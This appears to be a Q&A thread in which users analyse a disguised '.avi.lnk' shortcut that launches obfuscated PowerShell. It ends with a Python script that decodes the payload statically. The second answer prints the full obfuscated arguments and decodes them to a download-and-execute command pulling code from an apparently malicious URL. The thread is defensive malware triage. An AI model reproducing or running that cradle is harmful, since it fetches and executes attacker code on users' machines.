2

I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code] 

There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?

2
  • Well, when you click on it, it's running . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code] But I don't think I really understand what you are asking.
    – ArcSet
    Commented Nov 3, 2018 at 4:57
  • The first part of the code, represented by the decimal numbers, is "$aspx =". You can identify the rest using asciitable.com.
    – lit
    Commented Nov 3, 2018 at 15:43

2 Answers

5

My guess is that it runs PowerShell with

  • NoProfile
  • WindowStyle 1 = Minimized
  • ExecutionPolicy ByPass = Nothing is blocked and there are no warnings or prompts
  • then dot-sources the remaining code

Let's split this code up:

( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code] 

$ShellId is a built-in PowerShell variable:

  >$ShellId
  Microsoft.PowerShell

So ( $shelliD[1]+$SHeLlID[13]+'x') transforms to iex (= Invoke-Expression).

The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. I guess the char array contains ASCII characters. If so, we can transform it to:

$aspx =

Summary:

powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."

So it invokes the code starting with $aspx = in a minimized PowerShell window without warnings or prompts.

Maybe the code ran through one of these obfuscation methods.

Hope that helps.

1
  • @aaron1312, if the above proposal is fine for you, please mark my solution as the answer. Thx
    – Moerwald
    Commented Nov 3, 2018 at 16:00
1

I got the same. The file looked like an AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut:

PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target

FullName         : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments        : -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
                   112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
                   101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
                   111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
                   ,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description      : .avi
Hotkey           :
IconLocation     : C:\WINDOWS\System32\imageres.dll,18
RelativePath     :
TargetPath       : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle      : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

The target here translates to:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

I opened http://zvb.us/1 and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...
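The two answers above decode the shortcut by hand: expanding the abbreviated switches, resolving the $ShellId index trick to iex, and turning the [char[]] decimal list back into text. The following Python decoder is an added example (not code from either poster) that does the same three steps statically, so a .lnk's Arguments field can be triaged without ever running it; the SWITCHES list is an assumed, partial set of powershell.exe parameter names, and LNK_ARGUMENTS is the Arguments value from the second answer with its wrapped lines rejoined.

```python
"""Static decoder for the obfuscated PowerShell shortcut discussed above.
Nothing here runs PowerShell or touches the network; it only decodes text."""
import re

# Partial list (assumption) of powershell.exe switches; the binary accepts any unambiguous prefix.
SWITCHES = ("NoProfile", "WindowStyle", "ExecutionPolicy", "NonInteractive",
            "NoLogo", "EncodedCommand", "Command", "File", "NoExit")

# The shortcut's Arguments field as shown in the second answer, wrapped lines rejoined.
LNK_ARGUMENTS = (
    "-NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]]"
    "(36 ,97,115,112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,"
    "101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,"
    "111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47"
    ",122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )"
)

def expand_switch(short: str) -> str:
    """Expand an abbreviated switch (NoPr -> NoProfile) the way powershell.exe resolves prefixes."""
    hits = [s for s in SWITCHES if s.lower().startswith(short.lower())]
    return hits[0] if len(hits) == 1 else short  # ambiguous or unknown: keep as written

def resolve_shellid_alias(expr: str, shell_id: str = "Microsoft.PowerShell") -> str:
    """Evaluate string-building like ( $shelliD[1]+$SHeLlID[13]+'x') against $ShellId's value."""
    out = []
    for term in expr.strip(" ()").split("+"):
        m = re.fullmatch(r"\$shellid\[(\d+)\]", term.strip(), re.I)
        out.append(shell_id[int(m.group(1))] if m else term.strip().strip("'"))
    return "".join(out)

def decode_char_array(text: str) -> str:
    """Turn the first [char[]](36,97,...) decimal list in text back into the string it encodes."""
    m = re.search(r"\[char\[\]\]\(([\d\s,]+)\)", text, re.I)
    return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))) if m else ""

def triage(args: str) -> dict:
    """Summarise what the shortcut would run: expanded switches, resolved alias, decoded payload."""
    head = args.split(" . ")[0]  # everything before the dot-source operator
    switches = {expand_switch(s): v for s, v in re.findall(r"-(\w+)(?:\s+(?!-)(\w+))?", head)}
    alias = resolve_shellid_alias(re.search(r"\(\s*\$shellid[^)]*\)", args, re.I).group(0))
    payload = decode_char_array(args)
    return {"switches": switches, "alias": alias, "payload": payload,
            "downloads_and_executes": bool(re.search(r"DownloadString|IEX|Invoke-Expression", payload, re.I))}

if __name__ == "__main__":
    for key, value in triage(LNK_ARGUMENTS).items():
        print(f"{key}: {value}")
```

The decoder never evaluates the recovered string; it only reports that the payload downloads and executes remote content, which is the fact a responder needs before deciding whether the host is compromised.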
